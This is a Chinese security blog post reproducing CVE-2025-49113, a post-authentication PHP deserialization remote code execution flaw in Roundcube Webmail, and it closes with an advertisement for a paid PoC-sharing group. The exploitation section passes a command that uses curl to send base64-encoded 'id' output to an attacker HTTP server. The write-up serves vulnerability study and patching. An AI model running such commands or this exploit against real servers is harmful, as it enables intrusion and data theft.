Roundcube Mail后台代码执行漏洞复现(CVE-2025-49113)及POC

发布于 作者:

Roundcube Mail后台代码执行漏洞复现(CVE-2025-49113)及POC

原创 a1batr0ss 天翁安全 2025-06-09 01:00

免责声明:
本公众号所发布的全部内容,包括但不限于技术文章、POC脚本、漏洞利用工具及相关测试环境,均仅限于合法的网络安全学习、研究和教学用途。所有人在使用上述内容时,应严格遵守中华人民共和国相关法律法规以及道德伦理要求。未经明确的官方书面授权,严禁将公众号内的任何内容用于未经授权的渗透测试、漏洞利用或攻击行为。 所有人仅可在自己合法拥有或管理的系统环境中进行本地漏洞复现与安全测试,或用于具有明确授权的合法渗透测试项目。所有人不得以任何形式利用公众号内提供的内容从事非法、侵权或其他不当活动。 如因违反上述规定或不当使用本公众号提供的任何内容,造成的一切法律责任、经济损失、纠纷及其他任何形式的不利后果,均由相关成员自行承担,与本公众号无任何关联。

漏洞介绍

Roundcube Webmail 是一个基于浏览器的开源电子邮件客户端,采用 PHP 编写,支持 IMAP 协议,界面现代、用户友好,功能包括邮件收发、地址簿管理、邮件搜索、HTML 邮件编辑等。它具有插件扩展能力,易于部署和定制,广泛应用于企业或个人邮件系统的前端界面。由于其开放源代码和活跃社区,Roundcube 成为了最受欢迎的 Webmail 解决方案之一。

Roundcube Webmail 在 1.5.10 之前的版本以及 1.6.x 中 1.6.11 之前的版本,存在远程代码执行漏洞。该漏洞允许经过身份验证的用户发起攻击,原因是在 program/actions/settings/upload.php
 文件中,URL 中的 _from
 参数未被正确验证,从而导致了 PHP 对象反序列化漏洞

漏洞版本

  • Roundcube Webmail <1.5.10

  • Roundcube Webmail <1.6.11

漏洞利用

首先在攻击机上开启一个http服务

接着在攻击机执行POC


– https://192.168.1.157/mail
:目标Roundcube Mail地址

  • [email protected]
    :目标Roundcube Mail用户名

  • 123456
    :目标Roundcube Mail密码

  • ‘curl http://192.168.1.164:9000/$(id | base64 -w0)’
    :执行的命令(无回显)

执行成功之后,我们发现刚才开启的http服务已经有了回显

base64解密一下获取命令回显。至此,命令执行成功

漏洞修复

新版本新增了对 _from
参数的过滤,将其限制为简单字符串

修复将版本升级
– Roundcube Webmail >= 1.5.10

  • Roundcube Webmail >= 1.6.11

知识星球

漏洞利用POC和批量检查脚本
可在知识星球内自行领取

星球不定期更新市面上最新的热点漏洞及复现环境,欢迎加入交流和学习

亮点一、市面热点漏洞详细分析
,与deepseek本地部署
息息相关的:Ollama任意文件读取漏洞(CVE-2024-37032)详细分析

亮点二、近日最新披露
漏洞:Erlang/OTP SSH 远程代码执行漏洞(CVE-2025-32433)POC及一键部署环境

以及有师傅对该POC提出疑问后也会进行解答:

亮点三、框架漏洞专题-若依:

若依某漏洞分析:

以及帮助师傅们轻松搭建若依环境的docker的tar包:

亮点四、实战渗透测试技巧分享&讨论
:记一次信息泄漏到数据库接管的渗透测试

某次若依系统渗透测试带来的思考与讨论

亮点五、一些比较新奇有趣的漏洞分享:Windows拖拽图标
而触发的漏洞

知识星球加入方式如下,欢迎师傅们加入进行学习和讨论!